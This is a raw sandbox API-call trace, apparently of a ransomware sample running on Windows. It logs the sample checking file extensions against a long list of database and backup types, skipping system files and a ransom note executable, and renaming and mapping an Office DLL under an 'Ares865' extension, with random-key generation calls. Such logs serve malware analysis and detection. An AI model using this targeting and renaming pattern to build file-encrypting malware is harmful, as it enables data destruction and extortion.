[0088.020] lstrlenW (lpString="oqy") returned 3 [0088.020] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0088.020] lstrlenW (lpString="ora") returned 3 [0088.020] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0088.020] lstrlenW (lpString="orx") returned 3 [0088.020] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0088.020] lstrlenW (lpString="owc") returned 3 [0088.020] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0088.020] lstrlenW (lpString="p96") returned 3 [0088.020] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0088.020] lstrlenW (lpString="p97") returned 3 [0088.020] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0088.020] lstrlenW (lpString="pan") returned 3 [0088.020] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0088.020] lstrlenW (lpString="pdb") returned 3 [0088.020] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0088.020] lstrlenW (lpString="pdm") returned 3 [0088.020] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0088.020] lstrlenW (lpString="pnz") returned 3 [0088.020] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0088.020] lstrlenW (lpString="qry") returned 3 [0088.020] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0088.020] lstrlenW (lpString="qvd") returned 3 [0088.020] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0088.020] lstrlenW (lpString="rbf") returned 3 [0088.020] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0088.020] lstrlenW (lpString="rctd") returned 4 [0088.020] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0088.020] lstrlenW (lpString="rod") returned 3 [0088.020] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0088.020] lstrlenW (lpString="rodx") returned 4 [0088.020] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0088.020] lstrlenW (lpString="rpd") returned 3 [0088.020] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0088.020] lstrlenW (lpString="rsd") returned 3 [0088.020] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0088.021] lstrlenW (lpString="sas7bdat") returned 8 [0088.021] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0088.021] lstrlenW (lpString="sbf") returned 3 [0088.021] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0088.021] lstrlenW (lpString="scx") returned 3 [0088.021] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0088.021] lstrlenW (lpString="sdb") returned 3 [0088.021] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0088.021] lstrlenW (lpString="sdc") returned 3 [0088.021] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0088.021] lstrlenW (lpString="sdf") returned 3 [0088.021] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0088.021] lstrlenW (lpString="sis") returned 3 [0088.021] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0088.021] lstrlenW (lpString="spq") returned 3 [0088.021] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0088.021] lstrlenW (lpString="te") returned 2 [0088.021] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0088.021] lstrlenW (lpString="teacher") returned 7 [0088.021] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0088.021] lstrlenW (lpString="tmd") returned 3 [0088.021] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0088.021] lstrlenW (lpString="tps") returned 3 [0088.021] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0088.021] lstrlenW (lpString="trc") returned 3 [0088.021] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.021] lstrlenW (lpString="trc") returned 3 [0088.021] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.021] lstrlenW (lpString="trm") returned 3 [0088.021] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0088.021] lstrlenW (lpString="udb") returned 3 [0088.021] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0088.021] lstrlenW (lpString="udl") returned 3 [0088.021] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0088.021] lstrlenW (lpString="usr") returned 3 [0088.021] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0088.021] lstrlenW (lpString="v12") returned 3 [0088.021] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0088.022] lstrlenW (lpString="vis") returned 3 [0088.022] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0088.022] lstrlenW (lpString="vpd") returned 3 [0088.022] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0088.022] lstrlenW (lpString="vvv") returned 3 [0088.022] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0088.022] lstrlenW (lpString="wdb") returned 3 [0088.022] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0088.022] lstrlenW (lpString="wmdb") returned 4 [0088.022] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0088.022] lstrlenW (lpString="wrk") returned 3 [0088.022] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0088.022] lstrlenW (lpString="xdb") returned 3 [0088.022] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0088.022] lstrlenW (lpString="xld") returned 3 [0088.022] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0088.022] lstrlenW (lpString="xmlff") returned 5 [0088.022] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0088.022] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll.Ares865") returned 80 [0088.022] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0088.023] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0088.023] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=226656) returned 1 [0088.023] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0088.024] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0088.024] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0088.024] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0088.024] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0088.024] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.025] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x37860, lpName=0x0) returned 0x15c [0088.028] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x37860) returned 0x420000 [0088.040] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0088.040] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0088.040] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.040] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0088.041] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0088.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0088.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0088.041] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0088.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0088.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0088.041] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0088.041] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0088.041] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0088.041] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0088.043] CloseHandle (hObject=0x15c) returned 1 [0088.043] CloseHandle (hObject=0x118) returned 1 [0088.043] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0088.043] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0088.043] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0088.044] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ab87a00, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1ab87a00, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0xa6560, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OUTLLIBR.REST.trx_dll", cAlternateFileName="OUTLLI~2.TRX")) returned 1 [0088.044] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0088.044] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0088.044] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2=".") returned 1 [0088.044] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="..") returned 1 [0088.044] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="windows") returned -1 [0088.045] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="bootmgr") returned 1 [0088.045] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="temp") returned -1 [0088.045] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="pagefile.sys") returned -1 [0088.045] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="boot") returned 1 [0088.045] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="ids.txt") returned 1 [0088.045] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0088.045] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="perflogs") returned -1 [0088.045] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="MSBuild") returned 1 [0088.045] lstrlenW (lpString="OUTLLIBR.REST.trx_dll") returned 21 [0088.045] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll") returned 72 [0088.045] lstrcpyW (in: lpString1=0x2cce468, lpString2="OUTLLIBR.REST.trx_dll" | out: lpString1="OUTLLIBR.REST.trx_dll") returned="OUTLLIBR.REST.trx_dll" [0088.045] lstrlenW (lpString="OUTLLIBR.REST.trx_dll") returned 21 [0088.045] lstrlenW (lpString="Ares865") returned 7 [0088.045] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0088.045] lstrlenW (lpString=".dll") returned 4 [0088.045] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2=".dll") returned 1 [0088.045] lstrlenW (lpString=".lnk") returned 4 [0088.045] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2=".lnk") returned 1 [0088.045] lstrlenW (lpString=".ini") returned 4 [0088.045] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2=".ini") returned 1 [0088.045] lstrlenW (lpString=".sys") returned 4 [0088.045] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2=".sys") returned 1 [0088.045] lstrlenW (lpString="OUTLLIBR.REST.trx_dll") returned 21 [0088.045] lstrlenW (lpString="bak") returned 3 [0088.045] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0088.045] lstrlenW (lpString="ba_") returned 3 [0088.045] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0088.045] lstrlenW (lpString="dbb") returned 3 [0088.045] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0088.045] lstrlenW (lpString="vmdk") returned 4 [0088.045] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0088.045] lstrlenW (lpString="rar") returned 3 [0088.045] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0088.045] lstrlenW (lpString="zip") returned 3 [0088.045] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0088.045] lstrlenW (lpString="tgz") returned 3 [0088.045] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0088.045] lstrlenW (lpString="vbox") returned 4 [0088.046] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0088.046] lstrlenW (lpString="vdi") returned 3 [0088.046] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0088.046] lstrlenW (lpString="vhd") returned 3 [0088.046] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0088.046] lstrlenW (lpString="vhdx") returned 4 [0088.046] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0088.046] lstrlenW (lpString="avhd") returned 4 [0088.046] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0088.046] lstrlenW (lpString="db") returned 2 [0088.046] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0088.046] lstrlenW (lpString="db2") returned 3 [0088.046] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0088.046] lstrlenW (lpString="db3") returned 3 [0088.046] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0088.046] lstrlenW (lpString="dbf") returned 3 [0088.046] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0088.046] lstrlenW (lpString="mdf") returned 3 [0088.046] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0088.046] lstrlenW (lpString="mdb") returned 3 [0088.046] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0088.046] lstrlenW (lpString="sql") returned 3 [0088.046] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0088.046] lstrlenW (lpString="sqlite") returned 6 [0088.046] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0088.046] lstrlenW (lpString="sqlite3") returned 7 [0088.046] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0088.046] lstrlenW (lpString="sqlitedb") returned 8 [0088.046] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0088.046] lstrlenW (lpString="xml") returned 3 [0088.046] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0088.046] lstrlenW (lpString="$er") returned 3 [0088.046] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0088.046] lstrlenW (lpString="4dd") returned 3 [0088.046] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0088.046] lstrlenW (lpString="4dl") returned 3 [0088.046] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0088.046] lstrlenW (lpString="^^^") returned 3 [0088.046] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0088.047] lstrlenW (lpString="abs") returned 3 [0088.047] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0088.047] lstrlenW (lpString="abx") returned 3 [0088.047] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0088.047] lstrlenW (lpString="accdb") returned 5 [0088.047] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0088.047] lstrlenW (lpString="accdc") returned 5 [0088.047] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0088.047] lstrlenW (lpString="accde") returned 5 [0088.047] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0088.047] lstrlenW (lpString="accdr") returned 5 [0088.047] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0088.047] lstrlenW (lpString="accdt") returned 5 [0088.047] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0088.047] lstrlenW (lpString="accdw") returned 5 [0088.047] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0088.047] lstrlenW (lpString="accft") returned 5 [0088.047] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0088.047] lstrlenW (lpString="adb") returned 3 [0088.047] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.047] lstrlenW (lpString="adb") returned 3 [0088.047] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.047] lstrlenW (lpString="ade") returned 3 [0088.047] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0088.047] lstrlenW (lpString="adf") returned 3 [0088.047] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0088.047] lstrlenW (lpString="adn") returned 3 [0088.047] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0088.047] lstrlenW (lpString="adp") returned 3 [0088.047] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0088.047] lstrlenW (lpString="alf") returned 3 [0088.047] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0088.047] lstrlenW (lpString="ask") returned 3 [0088.047] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0088.047] lstrlenW (lpString="btr") returned 3 [0088.047] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0088.047] lstrlenW (lpString="cat") returned 3 [0088.047] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0088.048] lstrlenW (lpString="cdb") returned 3 [0088.048] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0088.048] lstrlenW (lpString="ckp") returned 3 [0088.048] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0088.048] lstrlenW (lpString="cma") returned 3 [0088.048] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0088.048] lstrlenW (lpString="cpd") returned 3 [0088.048] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0088.048] lstrlenW (lpString="dacpac") returned 6 [0088.048] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0088.048] lstrlenW (lpString="dad") returned 3 [0088.048] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0088.048] lstrlenW (lpString="dadiagrams") returned 10 [0088.048] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0088.048] lstrlenW (lpString="daschema") returned 8 [0088.048] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0088.048] lstrlenW (lpString="db-journal") returned 10 [0088.048] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0088.048] lstrlenW (lpString="db-shm") returned 6 [0088.048] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0088.048] lstrlenW (lpString="db-wal") returned 6 [0088.048] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0088.048] lstrlenW (lpString="dbc") returned 3 [0088.048] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0088.048] lstrlenW (lpString="dbs") returned 3 [0088.048] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0088.048] lstrlenW (lpString="dbt") returned 3 [0088.048] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0088.048] lstrlenW (lpString="dbv") returned 3 [0088.048] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0088.048] lstrlenW (lpString="dbx") returned 3 [0088.048] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0088.048] lstrlenW (lpString="dcb") returned 3 [0088.048] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0088.048] lstrlenW (lpString="dct") returned 3 [0088.048] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0088.048] lstrlenW (lpString="dcx") returned 3 [0088.048] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0088.049] lstrlenW (lpString="ddl") returned 3 [0088.049] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0088.049] lstrlenW (lpString="dlis") returned 4 [0088.049] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0088.049] lstrlenW (lpString="dp1") returned 3 [0088.049] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0088.049] lstrlenW (lpString="dqy") returned 3 [0088.049] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0088.049] lstrlenW (lpString="dsk") returned 3 [0088.049] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0088.049] lstrlenW (lpString="dsn") returned 3 [0088.049] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0088.049] lstrlenW (lpString="dtsx") returned 4 [0088.049] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0088.049] lstrlenW (lpString="dxl") returned 3 [0088.049] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0088.049] lstrlenW (lpString="eco") returned 3 [0088.049] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0088.049] lstrlenW (lpString="ecx") returned 3 [0088.049] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0088.049] lstrlenW (lpString="edb") returned 3 [0088.049] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0088.049] lstrlenW (lpString="epim") returned 4 [0088.049] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0088.049] lstrlenW (lpString="fcd") returned 3 [0088.049] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0088.049] lstrlenW (lpString="fdb") returned 3 [0088.049] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0088.049] lstrlenW (lpString="fic") returned 3 [0088.049] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0088.049] lstrlenW (lpString="flexolibrary") returned 12 [0088.049] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0088.049] lstrlenW (lpString="fm5") returned 3 [0088.049] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0088.049] lstrlenW (lpString="fmp") returned 3 [0088.049] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0088.049] lstrlenW (lpString="fmp12") returned 5 [0088.049] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0088.049] lstrlenW (lpString="fmpsl") returned 5 [0088.050] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0088.050] lstrlenW (lpString="fol") returned 3 [0088.050] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0088.050] lstrlenW (lpString="fp3") returned 3 [0088.050] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0088.050] lstrlenW (lpString="fp4") returned 3 [0088.050] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0088.050] lstrlenW (lpString="fp5") returned 3 [0088.050] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0088.050] lstrlenW (lpString="fp7") returned 3 [0088.050] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0088.050] lstrlenW (lpString="fpt") returned 3 [0088.050] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0088.050] lstrlenW (lpString="frm") returned 3 [0088.050] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0088.050] lstrlenW (lpString="gdb") returned 3 [0088.050] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.050] lstrlenW (lpString="gdb") returned 3 [0088.050] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.050] lstrlenW (lpString="grdb") returned 4 [0088.050] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0088.050] lstrlenW (lpString="gwi") returned 3 [0088.050] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0088.050] lstrlenW (lpString="hdb") returned 3 [0088.050] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0088.050] lstrlenW (lpString="his") returned 3 [0088.050] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0088.050] lstrlenW (lpString="ib") returned 2 [0088.050] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0088.050] lstrlenW (lpString="idb") returned 3 [0088.050] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0088.050] lstrlenW (lpString="ihx") returned 3 [0088.050] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0088.050] lstrlenW (lpString="itdb") returned 4 [0088.050] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0088.050] lstrlenW (lpString="itw") returned 3 [0088.050] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0088.050] lstrlenW (lpString="jet") returned 3 [0088.051] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0088.051] lstrlenW (lpString="jtx") returned 3 [0088.051] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0088.051] lstrlenW (lpString="kdb") returned 3 [0088.051] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0088.051] lstrlenW (lpString="kexi") returned 4 [0088.051] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0088.051] lstrlenW (lpString="kexic") returned 5 [0088.051] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0088.051] lstrlenW (lpString="kexis") returned 5 [0088.051] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0088.051] lstrlenW (lpString="lgc") returned 3 [0088.051] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0088.051] lstrlenW (lpString="lwx") returned 3 [0088.051] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0088.051] lstrlenW (lpString="maf") returned 3 [0088.051] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0088.051] lstrlenW (lpString="maq") returned 3 [0088.051] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0088.051] lstrlenW (lpString="mar") returned 3 [0088.051] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0088.051] lstrlenW (lpString="marshal") returned 7 [0088.051] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0088.051] lstrlenW (lpString="mas") returned 3 [0088.051] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0088.051] lstrlenW (lpString="mav") returned 3 [0088.051] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0088.051] lstrlenW (lpString="maw") returned 3 [0088.051] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0088.051] lstrlenW (lpString="mdbhtml") returned 7 [0088.051] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0088.051] lstrlenW (lpString="mdn") returned 3 [0088.051] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0088.051] lstrlenW (lpString="mdt") returned 3 [0088.051] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0088.051] lstrlenW (lpString="mfd") returned 3 [0088.051] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0088.051] lstrlenW (lpString="mpd") returned 3 [0088.051] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0088.052] lstrlenW (lpString="mrg") returned 3 [0088.052] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0088.052] lstrlenW (lpString="mud") returned 3 [0088.052] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0088.052] lstrlenW (lpString="mwb") returned 3 [0088.052] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0088.052] 